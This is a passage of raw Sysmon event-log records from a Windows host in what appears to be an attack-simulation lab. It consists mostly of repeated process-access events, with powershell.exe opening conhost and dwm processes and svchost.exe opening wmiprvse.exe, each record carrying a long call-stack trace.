13:53:11.602{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001233Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.539{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-2100-000000009101}2464C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001232Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.539{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001231Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.539{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-1B00-000000009101}2200C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001230Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.539{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-1A00-000000009101}2192C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001229Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.477{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 13241300x80000000000000001228Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:11.180{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 10341000x80000000000000001227Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.993{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001226Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.993{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001225Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.993{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001224Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.993{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001223Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.993{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001222Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.993{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001221Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.977{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001220Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.977{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001219Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.977{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001218Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.977{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001217Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.977{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001216Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.977{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001215Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.977{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001214Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.977{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001213Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.977{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001212Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.977{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001211Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.977{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001210Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.977{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001209Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:10.961{10ACEC4A-8546-5FCF-2400-000000009101}30562132C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\W